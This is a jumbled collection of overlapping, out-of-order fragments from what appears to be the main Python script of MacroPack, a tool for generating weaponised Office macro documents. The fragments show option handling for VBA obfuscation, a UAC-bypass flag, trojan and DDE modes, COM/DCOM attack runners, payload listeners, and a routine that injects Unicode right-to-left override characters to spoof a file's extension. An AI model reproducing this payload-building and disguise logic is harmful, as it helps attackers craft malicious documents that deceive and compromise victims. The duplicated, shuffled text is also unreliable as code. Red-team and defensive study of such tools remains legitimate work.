"utils.checkModuleExist(\"pro_core\"): from pro_modules.utilities.dcom_run import DcomGenerator from pro_modules.payload_builders.containers import ContainerGenerator from", "if os.path.isfile(inputFile): logging.info(\" [-] Temporary input file: %s\" % inputFile)", "--listformats to view supported MacroPack formats.\" % os.path.splitext(mpSession.outputFilePath)[1]) sys.exit(2) else:", "running_from = psutil.Process(os.getpid()).parent().parent().name() # if running_from == 'explorer.exe': # os.system(\"cmd.exe", "are not binary chars in input fil if utils.isBinaryString(open(mpSession.fileInput, 'rb').read(1024)):", "True elif opt==\"--obfuscate-names-charset\": try: mpSession.obfuscatedNamesCharset = arg except ValueError: help.printUsage(BANNER,", "opt == \"--unicode-rtlo\": mpSession.unicodeRtlo = arg elif opt in (\"-G\",", "for opt, arg in opts: if opt in (\"-o\", \"--obfuscate\"):", "logging.error(\" [!] ERROR: Could not find %s!\" % mpSession.fileInput) sys.exit(2)", "sys.exit(2) if not mpSession.isTrojanMode: # verify that output file does", "fileName += fileExtension mpSession.outputFilePath = fileName logging.info(\" [-] File name", "= os.path.abspath(arg) elif opt==\"-t\" or opt==\"--template\": mpSession.template = arg elif", "= True elif opt==\"--uac-bypass\": mpSession.uacBypass = True elif opt ==", "file. if mpSession.ddeMode or mpSession.template or (mpSession.outputFileType not in MSTypes.VB_FORMATS+[MSTypes.VBA]", "'w') f.writelines(mpSession.stdinContent) f.close() else: # Create temporary work file if", "fileExtension mpSession.outputFilePath = fileName logging.info(\" [-] File name modified to:", "== \"--run-visible\": if sys.platform == \"win32\": mpSession.runVisible = True elif", "colored # {PyArmor Protection Code} # {PyArmor Plugins} # use", "macro_pack session object working_directory = os.path.join(os.getcwd(), WORKING_DIR) if MP_TYPE ==", "MP_TYPE=\"Community\" from colorama import init from termcolor import colored #", "opt==\"-p\" or opt==\"--print\": mpSession.printFile = True elif opt == \"--dde\":", "import shutil import psutil from modules.com_run import ComGenerator from modules.web_server", "os.path.splitext(mpSession.outputFilePath)[1]) sys.exit(2) else: logging.info(\" [-] Target output format: %s\" %", "Append unicode RTLO to file name fileName += '\\u202e' #", "condition logging.info(\" [-] Store std input in file...\") f =", "if sys.platform == \"win32\": mpSession.ddeMode = True elif opt ==", "import arg_mgt_pro, mp_session_pro else: MP_TYPE=\"Community\" from colorama import init from", "generator.run() if MP_TYPE == \"Pro\": #run dcom attack if mpSession.dcom:", "longOptions.extend(arg_mgt_pro.proArgsLongOptions) shortOptions += arg_mgt_pro.proArgsShortOptions # Only enabled on windows if", "sys.platform == \"win32\": mpSession.runVisible = True elif opt == \"--force-yes\":", "elif opt==\"--obfuscate-declares\": mpSession.obfuscateDeclares = True elif opt==\"--obfuscate-names\": mpSession.obfuscateNames = True", "mpSession.WRoot = os.path.abspath(arg) elif opt == \"-f\" or opt== \"--input-file\":", "features not applied)\") MP_TYPE=\"Community\" else: arg_mgt_pro.verify(mpSession) # Check output file", "in file...\") f = open(inputFile, 'w') f.writelines(mpSession.stdinContent) f.close() else: #", "\"obfuscate-names-minlen=\", \"obfuscate-names-maxlen=\", \"file=\",\"template=\",\"listtemplates\",\"listformats\",\"icon=\", \"start-function=\",\"uac-bypass\", \"unicode-rtlo=\", \"dde\", \"print\", \"force-yes\", \"help\"] shortOptions=", "if sys.platform == \"win32\": mpSession.runVisible = True elif opt ==", "mpSession.isTrojanMode: # verify that output file does not already exist", "ERROR: Invalid format for %s. Input should be text format", "= True elif opt == \"--force-yes\": mpSession.forceYes = True elif", "+= '\\u202e' # Append extension to spoof in reverse order", "MP_TYPE) else: mpSession = mp_session.MpSession(working_directory, VERSION, MP_TYPE) try: longOptions =", "logging.info(\" [+] Cleaning...\") if os.path.isdir(working_directory): shutil.rmtree(working_directory) logging.info(\" Done!\\n\") sys.exit(0) if", "mpSession.icon = arg elif opt==\"-w\" or opt==\"--webdav-listen\": mpSession.Wlisten = True", "else 'clear') # Logging logging.basicConfig(level=getattr(logging, logLevel),format=\"%(message)s\", handlers=[utils.ColorLogFiler()]) logging.info(colored(BANNER, 'green')) logging.info(\"", "fileName += '\\u202e' # Append extension to spoof in reverse", "reverse order fileName += '\\u200b' + mpSession.unicodeRtlo[::-1] # Prepend invisible", "format: %s\" % mpSession.outputFileType) elif not mpSession.listen and not mpSession.Wlisten", "elif opt==\"-t\" or opt==\"--template\": mpSession.template = arg elif opt ==", "sys.exit(2) for opt, arg in opts: if opt in (\"-o\",", "if not os.path.isdir(os.path.dirname(mpSession.outputFilePath)): logging.error(\" [!] Could not find output folder", "= sys.stdin.readlines() # Close Stdin pipe, so we can call", "== 'explorer.exe': # os.system(\"cmd.exe /k \\\"%s\\\"\" % utils.getRunningApp()) # PyArmor", "extension fileName += fileExtension mpSession.outputFilePath = fileName logging.info(\" [-] File", "mpSession.unicodeRtlo = arg elif opt in (\"-G\", \"--generate\"): mpSession.outputFilePath =", "+ \".vba\" if mpSession.stdinContent is not None: import time time.sleep(0.4)", "if mpSession.obfuscatedNamesMinLen < 4 or mpSession.obfuscatedNamesMinLen > 255: help.printUsage(BANNER, sys.argv[0])", "is not None: import time time.sleep(0.4) # Needed to avoid", "255: help.printUsage(BANNER, sys.argv[0]) sys.exit(0) elif opt==\"--obfuscate-names-maxlen\": try: mpSession.obfuscatedNamesMaxLen = int(arg)", "if something is being piped logging.info(\" [-] Waiting for piped", "[-] Target output format: %s\" % mpSession.outputFileType) elif not mpSession.listen", "mpSession.uacBypass = True elif opt == \"--unicode-rtlo\": mpSession.unicodeRtlo = arg", "psutil from modules.com_run import ComGenerator from modules.web_server import ListenServer from", "Exception caught!\") except KeyboardInterrupt: logging.error(\" [!] Keyboard interrupt caught!\") logging.info(\"", "help.printUsage(BANNER, sys.argv[0]) sys.exit(2) for opt, arg in opts: if opt", "to spoof extension if unicodeRtlo option is enabled if mpSession.unicodeRtlo:", "getopt.GetoptError: help.printUsage(BANNER, sys.argv[0]) sys.exit(2) for opt, arg in opts: if", "not None: # Check there are not binary chars in", "# only for Pro release if MP_TYPE == \"Pro\": longOptions.extend(arg_mgt_pro.proArgsLongOptions)", "output file does not already exist if os.path.isfile(mpSession.outputFilePath): logging.error(\" [!]", "[!] ERROR: Output file %s already exist!\" % mpSession.outputFilePath) sys.exit(2)", "ERROR: Output file %s already exist!\" % mpSession.outputFilePath) sys.exit(2) #Create", "so filename does not end with flagged extension # Append", "mp_session_pro.MpSessionPro(working_directory, VERSION, MP_TYPE) else: mpSession = mp_session.MpSession(working_directory, VERSION, MP_TYPE) try:", "mpSession = mp_session_pro.MpSessionPro(working_directory, VERSION, MP_TYPE) else: mpSession = mp_session.MpSession(working_directory, VERSION,", "# Check there are not binary chars in input fil", "Windows too init() WORKING_DIR = \"temp\" BANNER = help.getToolPres() def", "opt == \"--listtemplates\": help.printTemplatesUsage(BANNER, sys.argv[0]) sys.exit(0) elif opt==\"-q\" or opt==\"--quiet\":", "invisible space so filename does not end with flagged extension", "\"Pro\": #run dcom attack if mpSession.dcom: generator = DcomGenerator(mpSession) generator.run()", "if MP_TYPE == \"Pro\": longOptions.extend(arg_mgt_pro.proArgsLongOptions) shortOptions += arg_mgt_pro.proArgsShortOptions # Only", "PayloadBuilderFactoryPro().getPayloadBuilder(mpSession) else: payloadBuilder = PayloadBuilderFactory().getPayloadBuilder(mpSession) # Build payload if payloadBuilder", "import utils, mp_session, help from common.utils import MSTypes from common.definitions", "Output file %s already exist!\" % mpSession.outputFilePath) sys.exit(2) #Create temporary", "unicodeRtlo option is enabled if mpSession.unicodeRtlo: # Reminder; mpSession.unicodeRtlo contains", "file if mpSession.fileInput is not None: # Check there are", "MP_TYPE == \"Pro\": #run dcom attack if mpSession.dcom: generator =", "sys.platform == \"win32\": longOptions.extend([\"run=\", \"run-visible\"]) opts, args = getopt.getopt(argv, shortOptions,", "win32com.client #@UnresolvedImport @UnusedImport except: print(\"Error: Could not find win32com.\") sys.exit(1)", "can call input() later without triggering EOF #sys.stdin.close() if sys.platform", "mpSession.Wlisten and mpSession.runTarget is None and (MP_TYPE != \"Pro\" or", "+= fileExtension mpSession.outputFilePath = fileName logging.info(\" [-] File name modified", "opt, arg in opts: if opt in (\"-o\", \"--obfuscate\"): mpSession.obfuscateForm", "VBA script.\" % mpSession.fileInput) logging.info(\" [+] Cleaning...\") if os.path.isdir(working_directory): shutil.rmtree(working_directory)", "\"--run\": if sys.platform == \"win32\": mpSession.runTarget = os.path.abspath(arg) elif opt", "contains the extension we want to spoof, such as \"jpg\"", "Edit outputfile name to spoof extension if unicodeRtlo option is", "\"obfuscate-names\", \"obfuscate-declares\", \"obfuscate-strings\", \"obfuscate-names-charset=\", \"obfuscate-names-minlen=\", \"obfuscate-names-maxlen=\", \"file=\",\"template=\",\"listtemplates\",\"listformats\",\"icon=\", \"start-function=\",\"uac-bypass\", \"unicode-rtlo=\", \"dde\",", "for %s. Input should be text format containing your VBA", "file path: %s\" % mpSession.fileInput) if MP_TYPE == \"Pro\": if", "True elif opt == \"--run\": if sys.platform == \"win32\": mpSession.runTarget", "Logging logging.basicConfig(level=getattr(logging, logLevel),format=\"%(message)s\", handlers=[utils.ColorLogFiler()]) logging.info(colored(BANNER, 'green')) logging.info(\" [+] Preparations...\") #", "except getopt.GetoptError: help.printUsage(BANNER, sys.argv[0]) sys.exit(2) for opt, arg in opts:", "= True mpSession.WRoot = os.path.abspath(arg) elif opt == \"-f\" or", "[!] %s is not a supported extension. Use --listformats to", "Waiting for piped input feed...\") mpSession.stdinContent = sys.stdin.readlines() # Close", "order fileName += '\\u200b' + mpSession.unicodeRtlo[::-1] # Prepend invisible space", "inputFile = os.path.join(working_directory, utils.randomAlpha(9)) + \".vba\" if mpSession.stdinContent is not", "from modules.Wlisten_server import WListenServer from modules.payload_builder_factory import PayloadBuilderFactory from common", "shutil import psutil from modules.com_run import ComGenerator from modules.web_server import", "import colored # {PyArmor Protection Code} # {PyArmor Plugins} #", "\"obfuscate-names-maxlen=\", \"file=\",\"template=\",\"listtemplates\",\"listformats\",\"icon=\", \"start-function=\",\"uac-bypass\", \"unicode-rtlo=\", \"dde\", \"print\", \"force-yes\", \"help\"] shortOptions= \"e:l:w:s:f:t:G:hqmop\"", "Temporary working dir: %s\" % working_directory) if not os.path.exists(working_directory): os.makedirs(working_directory)", "(mpSession.outputFileType not in MSTypes.VB_FORMATS+[MSTypes.VBA] and not mpSession.htaMacro): inputFile = os.path.join(working_directory,", "or opt== \"--input-file\": mpSession.fileInput = arg elif opt == \"-e\"", "% os.path.splitext(mpSession.outputFilePath)[1]) sys.exit(2) else: logging.info(\" [-] Target output format: %s\"", "[-] Temporary input file: %s\" % inputFile) # Edit outputfile", "attack if mpSession.dcom: generator = DcomGenerator(mpSession) generator.run() # Activate Web", "== \"Pro\" and not mpSession.communityMode: payloadBuilder = PayloadBuilderFactoryPro().getPayloadBuilder(mpSession) else: payloadBuilder", "= True mpSession.obfuscateDeclares = True elif opt==\"--obfuscate-form\": mpSession.obfuscateForm = True", "opt == \"--dde\": if sys.platform == \"win32\": mpSession.ddeMode = True", "option is enabled if mpSession.unicodeRtlo: # Reminder; mpSession.unicodeRtlo contains the", "fileName += '\\u200b' + mpSession.unicodeRtlo[::-1] # Prepend invisible space so", "generator.run() # Activate Web server if mpSession.listen: listener = ListenServer(mpSession)", "sys.platform == \"win32\": try: import win32com.client #@UnresolvedImport @UnusedImport except: print(\"Error:", "opt==\"--obfuscate-names-maxlen\": try: mpSession.obfuscatedNamesMaxLen = int(arg) except ValueError: help.printUsage(BANNER, sys.argv[0]) sys.exit(0)", "not find %s!\" % mpSession.fileInput) sys.exit(2) else: logging.info(\" [-] Input", "\"generate=\", \"quiet\", \"input-file=\", \"encode\", \"obfuscate\", \"obfuscate-form\", \"obfuscate-names\", \"obfuscate-declares\", \"obfuscate-strings\", \"obfuscate-names-charset=\",", "(pro features not applied)\") MP_TYPE=\"Community\" else: arg_mgt_pro.verify(mpSession) # Check output", "-h)\" % os.path.basename(utils.getRunningApp())) sys.exit(2) if not mpSession.isTrojanMode: # verify that", "use Colorama to make Termcolor work on Windows too init()", "to view supported MacroPack formats.\" % os.path.splitext(mpSession.outputFilePath)[1]) sys.exit(2) else: logging.info(\"", "os.path.isdir(working_directory): shutil.rmtree(working_directory) logging.info(\" Done!\\n\") sys.exit(0) if __name__ == '__main__': #", "\"--generate\"): mpSession.outputFilePath = os.path.abspath(arg) elif opt == \"--listformats\": help.printAvailableFormats(BANNER) sys.exit(0)", "%s\" % mpSession.outputFilePath) # Retrieve the right payload builder if", "arg elif opt == \"-e\" or opt== \"--embed\": mpSession.embeddedFilePath =", "\"win32\": mpSession.ddeMode = True elif opt == \"--run\": if sys.platform", "%s.\" % os.path.dirname(mpSession.outputFilePath)) sys.exit(2) if mpSession.outputFileType == MSTypes.UNKNOWN: logging.error(\" [!]", "using %s -h)\" % os.path.basename(utils.getRunningApp())) sys.exit(2) if not mpSession.isTrojanMode: #", "\"obfuscate-form\", \"obfuscate-names\", \"obfuscate-declares\", \"obfuscate-strings\", \"obfuscate-names-charset=\", \"obfuscate-names-minlen=\", \"obfuscate-names-maxlen=\", \"file=\",\"template=\",\"listtemplates\",\"listformats\",\"icon=\", \"start-function=\",\"uac-bypass\", \"unicode-rtlo=\",", "in (\"-o\", \"--obfuscate\"): mpSession.obfuscateForm = True mpSession.obfuscateNames = True mpSession.obfuscateStrings", "\"webdav-listen=\", \"generate=\", \"quiet\", \"input-file=\", \"encode\", \"obfuscate\", \"obfuscate-form\", \"obfuscate-names\", \"obfuscate-declares\", \"obfuscate-strings\",", "does not end with flagged extension # Append file extension", "common import utils, mp_session, help from common.utils import MSTypes from", "\"e:l:w:s:f:t:G:hqmop\" # only for Pro release if MP_TYPE == \"Pro\":", "else: payloadBuilder = PayloadBuilderFactory().getPayloadBuilder(mpSession) # Build payload if payloadBuilder is", "@UnusedVariable except getopt.GetoptError: help.printUsage(BANNER, sys.argv[0]) sys.exit(2) for opt, arg in", "logging.info(\" Done!\\n\") sys.exit(0) if __name__ == '__main__': # check if", "if MP_TYPE == \"Pro\": mpSession = mp_session_pro.MpSessionPro(working_directory, VERSION, MP_TYPE) else:", "if mpSession.unicodeRtlo: # Reminder; mpSession.unicodeRtlo contains the extension we want", "\"obfuscate\", \"obfuscate-form\", \"obfuscate-names\", \"obfuscate-declares\", \"obfuscate-strings\", \"obfuscate-names-charset=\", \"obfuscate-names-minlen=\", \"obfuscate-names-maxlen=\", \"file=\",\"template=\",\"listtemplates\",\"listformats\",\"icon=\", \"start-function=\",\"uac-bypass\",", "find output folder %s.\" % os.path.dirname(mpSession.outputFilePath)) sys.exit(2) if mpSession.outputFileType ==", "exist if os.path.isfile(mpSession.outputFilePath): logging.error(\" [!] ERROR: Output file %s already", "# Logging logging.basicConfig(level=getattr(logging, logLevel),format=\"%(message)s\", handlers=[utils.ColorLogFiler()]) logging.info(colored(BANNER, 'green')) logging.info(\" [+] Preparations...\")", "[+] Cleaning...\") if os.path.isdir(working_directory): shutil.rmtree(working_directory) logging.info(\" Done!\\n\") sys.exit(0) if __name__", "not os.path.isfile(mpSession.fileInput): logging.error(\" [!] ERROR: Could not find %s!\" %", "from explorer, if yes restart from cmd line # running_from", "generator.run() #run com attack if mpSession.runTarget: generator = ComGenerator(mpSession) generator.run()", "extension (fileName, fileExtension) = os.path.splitext(mpSession.outputFilePath) logging.info(\" [-] Extension %s \"", "arg_mgt_pro.verify(mpSession) # Check output file format if mpSession.outputFilePath: if not", "for Pro release if MP_TYPE == \"Pro\": longOptions.extend(arg_mgt_pro.proArgsLongOptions) shortOptions +=", "\"temp\" BANNER = help.getToolPres() def main(argv): global MP_TYPE logLevel =", "# Activate Web server if mpSession.listen: listener = ListenServer(mpSession) listener.run()", "logLevel = LOGLEVEL # initialize macro_pack session object working_directory =", "# Close Stdin pipe, so we can call input() later", "should be text format containing your VBA script.\" % mpSession.fileInput)", "input file: %s\" % inputFile) # Edit outputfile name to", "else: inputFile = os.path.join(working_directory, utils.randomAlpha(9)) + \".vba\" if mpSession.stdinContent is", "= True elif opt==\"--obfuscate-names-charset\": try: mpSession.obfuscatedNamesCharset = arg except ValueError:", "from pro_core import arg_mgt_pro, mp_session_pro else: MP_TYPE=\"Community\" from colorama import", "not os.path.exists(working_directory): os.makedirs(working_directory) try: # Create temporary work file. if", "space so filename does not end with flagged extension #", "if os.path.isfile(mpSession.outputFilePath): logging.error(\" [!] ERROR: Output file %s already exist!\"", "containing your VBA script.\" % mpSession.fileInput) logging.info(\" [+] Cleaning...\") if", "import VERSION, LOGLEVEL if sys.platform == \"win32\": try: import win32com.client", "\"help\"] shortOptions= \"e:l:w:s:f:t:G:hqmop\" # only for Pro release if MP_TYPE", "= open(\"conIN$\") else: sys.stdin = sys.__stdin__ else: if not os.path.isfile(mpSession.fileInput):", "\"run-visible\"]) opts, args = getopt.getopt(argv, shortOptions, longOptions) # @UnusedVariable except", "main(argv): global MP_TYPE logLevel = LOGLEVEL # initialize macro_pack session", "PayloadBuilderFactoryPro from pro_core import arg_mgt_pro, mp_session_pro else: MP_TYPE=\"Community\" from colorama", "opt==\"--start-function\": mpSession.startFunction = arg elif opt==\"-l\" or opt==\"--listen\": mpSession.listen =", "= mp_session.MpSession(working_directory, VERSION, MP_TYPE) try: longOptions = [\"embed=\", \"listen=\", \"port=\",", "opt==\"--obfuscate-declares\": mpSession.obfuscateDeclares = True elif opt==\"--obfuscate-names\": mpSession.obfuscateNames = True elif", "logging.info(\" [+] Preparations...\") # check input args if mpSession.fileInput is", "args if mpSession.fileInput is None: # Argument not supplied, try", "= True elif opt == \"--unicode-rtlo\": mpSession.unicodeRtlo = arg elif", "Create temporary work file if mpSession.fileInput is not None: #", "be text format containing your VBA script.\" % mpSession.fileInput) logging.info(\"", "try to get file content from stdin if not os.isatty(0):", "mpSession.obfuscateDeclares = True elif opt==\"--obfuscate-form\": mpSession.obfuscateForm = True elif opt==\"--obfuscate-declares\":", "[!] Could not find output folder %s.\" % os.path.dirname(mpSession.outputFilePath)) sys.exit(2)", "%s \" % fileExtension) # Append unicode RTLO to file", "logging.exception(\" [!] Exception caught!\") except KeyboardInterrupt: logging.error(\" [!] Keyboard interrupt", "# Retrieve the right payload builder if mpSession.outputFileType != MSTypes.UNKNOWN:", "[+] Inject %s false extension with unicode RTLO\" % mpSession.unicodeRtlo)", "MP_TYPE) try: longOptions = [\"embed=\", \"listen=\", \"port=\", \"webdav-listen=\", \"generate=\", \"quiet\",", "line # running_from = psutil.Process(os.getpid()).parent().parent().name() # if running_from == 'explorer.exe':", "os.path.abspath(arg) elif opt == \"--listformats\": help.printAvailableFormats(BANNER) sys.exit(0) elif opt==\"-h\" or", "sys.exit(0) elif opt==\"-h\" or opt==\"--help\": help.printUsage(BANNER, sys.argv[0]) sys.exit(0) else: if", "from modules.payload_builder_factory import PayloadBuilderFactory from common import utils, mp_session, help", "\".vba\" if mpSession.stdinContent is not None: import time time.sleep(0.4) #", "Protection Code} # {PyArmor Plugins} # use Colorama to make", "\"Pro\": if mpSession.communityMode: logging.warning(\" [!] Running in community mode (pro", "= PayloadBuilderFactory().getPayloadBuilder(mpSession) # Build payload if payloadBuilder is not None:", "\"encode\", \"obfuscate\", \"obfuscate-form\", \"obfuscate-names\", \"obfuscate-declares\", \"obfuscate-strings\", \"obfuscate-names-charset=\", \"obfuscate-names-minlen=\", \"obfuscate-names-maxlen=\", \"file=\",\"template=\",\"listtemplates\",\"listformats\",\"icon=\",", "in reverse order fileName += '\\u200b' + mpSession.unicodeRtlo[::-1] # Prepend", "\"win32\": sys.stdin = open(\"conIN$\") else: sys.stdin = sys.__stdin__ else: if", "builder if mpSession.outputFileType != MSTypes.UNKNOWN: if MP_TYPE == \"Pro\" and", "folder logging.info(\" [-] Temporary working dir: %s\" % working_directory) if", "== \"--dde\": if sys.platform == \"win32\": mpSession.ddeMode = True elif", "# verify that output file does not already exist if", "is not None: payloadBuilder.run() if MP_TYPE == \"Pro\": generator =", "elif opt==\"-s\" or opt==\"--start-function\": mpSession.startFunction = arg elif opt==\"-l\" or", "open(inputFile, 'w') f.writelines(mpSession.stdinContent) f.close() else: # Create temporary work file", "sys.stdin = open(\"conIN$\") else: sys.stdin = sys.__stdin__ else: if not", "input file...\") shutil.copy2(mpSession.fileInput, inputFile) if os.path.isfile(inputFile): logging.info(\" [-] Temporary input", "os.path.abspath(arg) elif opt==\"--port\": mpSession.listenPort = int(arg) mpSession.WlistenPort = int(arg) elif", "DcomGenerator from pro_modules.payload_builders.containers import ContainerGenerator from pro_core.payload_builder_factory_pro import PayloadBuilderFactoryPro from", "or mpSession.dcomTarget is None): logging.error(\" [!] You need to provide", "os.path.isfile(inputFile): logging.info(\" [-] Temporary input file: %s\" % inputFile) #", "help.printUsage(BANNER, sys.argv[0]) sys.exit(0) elif opt==\"--obfuscate-names-maxlen\": try: mpSession.obfuscatedNamesMaxLen = int(arg) except", "sys.argv[0]) sys.exit(0) if mpSession.obfuscatedNamesMaxLen < 4 or mpSession.obfuscatedNamesMaxLen > 255:", "None: # Check there are not binary chars in input", "%s false extension with unicode RTLO\" % mpSession.unicodeRtlo) # Separate", "None: payloadBuilder.run() if MP_TYPE == \"Pro\": generator = ContainerGenerator(mpSession) generator.run()", "if sys.platform == \"win32\": mpSession.runTarget = os.path.abspath(arg) elif opt ==", "opt==\"--obfuscate-form\": mpSession.obfuscateForm = True elif opt==\"--obfuscate-declares\": mpSession.obfuscateDeclares = True elif", "== \"Pro\": #run dcom attack if mpSession.dcom: generator = DcomGenerator(mpSession)", "WListenServer from modules.payload_builder_factory import PayloadBuilderFactory from common import utils, mp_session,", "from stdin if not os.isatty(0): # check if something is", "= mp_session_pro.MpSessionPro(working_directory, VERSION, MP_TYPE) else: mpSession = mp_session.MpSession(working_directory, VERSION, MP_TYPE)", "mpSession.runVisible = True elif opt == \"--force-yes\": mpSession.forceYes = True", "logging.info(\" [+] Inject %s false extension with unicode RTLO\" %", "try: mpSession.obfuscatedNamesMinLen = int(arg) except ValueError: help.printUsage(BANNER, sys.argv[0]) sys.exit(0) if", "Check output file format if mpSession.outputFilePath: if not os.path.isdir(os.path.dirname(mpSession.outputFilePath)): logging.error(\"", "release if MP_TYPE == \"Pro\": longOptions.extend(arg_mgt_pro.proArgsLongOptions) shortOptions += arg_mgt_pro.proArgsShortOptions #", "+= '\\u200b' + mpSession.unicodeRtlo[::-1] # Prepend invisible space so filename", "= ListenServer(mpSession) listener.run() # Activate WebDav server if mpSession.Wlisten: Wlistener", "already exist if os.path.isfile(mpSession.outputFilePath): logging.error(\" [!] ERROR: Output file %s", "not os.path.isdir(os.path.dirname(mpSession.outputFilePath)): logging.error(\" [!] Could not find output folder %s.\"", "'__main__': # check if running from explorer, if yes restart", "shortOptions, longOptions) # @UnusedVariable except getopt.GetoptError: help.printUsage(BANNER, sys.argv[0]) sys.exit(2) for", "work file. if mpSession.ddeMode or mpSession.template or (mpSession.outputFileType not in", "mpSession.fileInput) sys.exit(2) else: logging.info(\" [-] Input file path: %s\" %", "= True elif opt==\"--obfuscate-form\": mpSession.obfuscateForm = True elif opt==\"--obfuscate-declares\": mpSession.obfuscateDeclares", "== MSTypes.UNKNOWN: logging.error(\" [!] %s is not a supported extension.", "not os.isatty(0): # check if something is being piped logging.info(\"", "import getopt import logging import shutil import psutil from modules.com_run", "not already exist if os.path.isfile(mpSession.outputFilePath): logging.error(\" [!] ERROR: Output file", "logging.info(\" [-] Input file path: %s\" % mpSession.fileInput) if MP_TYPE", "os.makedirs(working_directory) try: # Create temporary work file. if mpSession.ddeMode or", "except ValueError: help.printUsage(BANNER, sys.argv[0]) sys.exit(0) if mpSession.obfuscatedNamesMinLen < 4 or", "get file content from stdin if not os.isatty(0): # check", "sys.exit(0) elif opt==\"-q\" or opt==\"--quiet\": logLevel = \"WARN\" elif opt==\"-p\"", "name to spoof extension if unicodeRtlo option is enabled if", "listener.run() # Activate WebDav server if mpSession.Wlisten: Wlistener = WListenServer(mpSession)", "Cleaning...\") if os.path.isdir(working_directory): shutil.rmtree(working_directory) logging.info(\" Done!\\n\") sys.exit(0) if __name__ ==", "os.isatty(0): # check if something is being piped logging.info(\" [-]", "only for Pro release if MP_TYPE == \"Pro\": longOptions.extend(arg_mgt_pro.proArgsLongOptions) shortOptions", "import logging import shutil import psutil from modules.com_run import ComGenerator", "applied)\") MP_TYPE=\"Community\" else: arg_mgt_pro.verify(mpSession) # Check output file format if", "import psutil from modules.com_run import ComGenerator from modules.web_server import ListenServer", "shutil.rmtree(working_directory) sys.exit(2) logging.info(\" [-] Store input file...\") shutil.copy2(mpSession.fileInput, inputFile) if", "def main(argv): global MP_TYPE logLevel = LOGLEVEL # initialize macro_pack", "True elif opt==\"--obfuscate-names\": mpSession.obfuscateNames = True elif opt==\"--obfuscate-names-charset\": try: mpSession.obfuscatedNamesCharset", "generator = DcomGenerator(mpSession) generator.run() # Activate Web server if mpSession.listen:", "opt == \"--run\": if sys.platform == \"win32\": mpSession.runTarget = os.path.abspath(arg)", "if not mpSession.isTrojanMode: # verify that output file does not", "os.path.abspath(arg) elif opt==\"-t\" or opt==\"--template\": mpSession.template = arg elif opt", "os import sys import getopt import logging import shutil import", "True elif opt == \"--dde\": if sys.platform == \"win32\": mpSession.ddeMode", "MP_TYPE == \"Pro\": arg_mgt_pro.processProArg(opt, arg, mpSession, BANNER) else: help.printUsage(BANNER, sys.argv[0])", "mpSession.obfuscateNames = True elif opt==\"--obfuscate-names-charset\": try: mpSession.obfuscatedNamesCharset = arg except", "there are not binary chars in input fil if utils.isBinaryString(open(mpSession.fileInput,", "filename does not end with flagged extension # Append file", "or mpSession.obfuscatedNamesMaxLen > 255: help.printUsage(BANNER, sys.argv[0]) sys.exit(0) elif opt==\"--obfuscate-strings\": mpSession.obfuscateStrings", "# use Colorama to make Termcolor work on Windows too", "\"obfuscate-strings\", \"obfuscate-names-charset=\", \"obfuscate-names-minlen=\", \"obfuscate-names-maxlen=\", \"file=\",\"template=\",\"listtemplates\",\"listformats\",\"icon=\", \"start-function=\",\"uac-bypass\", \"unicode-rtlo=\", \"dde\", \"print\", \"force-yes\",", "import init from termcolor import colored # {PyArmor Protection Code}", "MP_TYPE=\"Community\" else: arg_mgt_pro.verify(mpSession) # Check output file format if mpSession.outputFilePath:", "spoof, such as \"jpg\" logging.info(\" [+] Inject %s false extension", "os.path.splitext(mpSession.outputFilePath) logging.info(\" [-] Extension %s \" % fileExtension) # Append", "os.path.isdir(working_directory): shutil.rmtree(working_directory) sys.exit(2) logging.info(\" [-] Store input file...\") shutil.copy2(mpSession.fileInput, inputFile)", "% mpSession.unicodeRtlo) # Separate document path and extension (fileName, fileExtension)", "mpSession.listen = True mpSession.listenRoot = os.path.abspath(arg) elif opt==\"--port\": mpSession.listenPort =", "check if running from explorer, if yes restart from cmd", "True mpSession.obfuscateStrings = True mpSession.obfuscateDeclares = True elif opt==\"--obfuscate-form\": mpSession.obfuscateForm", "Check there are not binary chars in input fil if", "\"jpg\" logging.info(\" [+] Inject %s false extension with unicode RTLO\"", "file content from stdin if not os.isatty(0): # check if", "sys.exit(0) elif opt==\"--obfuscate-names-maxlen\": try: mpSession.obfuscatedNamesMaxLen = int(arg) except ValueError: help.printUsage(BANNER,", "output format: %s\" % mpSession.outputFileType) elif not mpSession.listen and not", "mpSession.ddeMode = True elif opt == \"--run\": if sys.platform ==", "else: sys.stdin = sys.__stdin__ else: if not os.path.isfile(mpSession.fileInput): logging.error(\" [!]", "server if mpSession.listen: listener = ListenServer(mpSession) listener.run() # Activate WebDav", "and (MP_TYPE != \"Pro\" or mpSession.dcomTarget is None): logging.error(\" [!]", "elif opt==\"-p\" or opt==\"--print\": mpSession.printFile = True elif opt ==", "True elif opt==\"--uac-bypass\": mpSession.uacBypass = True elif opt == \"--unicode-rtlo\":", "= ComGenerator(mpSession) generator.run() if MP_TYPE == \"Pro\": #run dcom attack", "# check if running from explorer, if yes restart from", "\"Pro\" or mpSession.dcomTarget is None): logging.error(\" [!] You need to", "Exception: logging.exception(\" [!] Exception caught!\") except KeyboardInterrupt: logging.error(\" [!] Keyboard", "too init() WORKING_DIR = \"temp\" BANNER = help.getToolPres() def main(argv):", "Append extension to spoof in reverse order fileName += '\\u200b'", "Store std input in file...\") f = open(inputFile, 'w') f.writelines(mpSession.stdinContent)", "else: if not os.path.isfile(mpSession.fileInput): logging.error(\" [!] ERROR: Could not find", "% mpSession.outputFilePath) # Retrieve the right payload builder if mpSession.outputFileType", "= psutil.Process(os.getpid()).parent().parent().name() # if running_from == 'explorer.exe': # os.system(\"cmd.exe /k", "something is being piped logging.info(\" [-] Waiting for piped input", "without triggering EOF #sys.stdin.close() if sys.platform == \"win32\": sys.stdin =", "RTLO\" % mpSession.unicodeRtlo) # Separate document path and extension (fileName,", "== \"win32\": longOptions.extend([\"run=\", \"run-visible\"]) opts, args = getopt.getopt(argv, shortOptions, longOptions)", "!= \"Pro\" or mpSession.dcomTarget is None): logging.error(\" [!] You need", "utils.randomAlpha(9)) + \".vba\" if mpSession.stdinContent is not None: import time", "\"quiet\", \"input-file=\", \"encode\", \"obfuscate\", \"obfuscate-form\", \"obfuscate-names\", \"obfuscate-declares\", \"obfuscate-strings\", \"obfuscate-names-charset=\", \"obfuscate-names-minlen=\",", "help.printUsage(BANNER, sys.argv[0]) sys.exit(0) if mpSession.obfuscatedNamesMaxLen < 4 or mpSession.obfuscatedNamesMaxLen >", "sys.exit(2) else: logging.info(\" [-] Input file path: %s\" % mpSession.fileInput)", "[!] ERROR: Invalid format for %s. Input should be text", "LOGLEVEL # initialize macro_pack session object working_directory = os.path.join(os.getcwd(), WORKING_DIR)", "os.path.join(working_directory, \"command.cmd\") else: inputFile = os.path.join(working_directory, 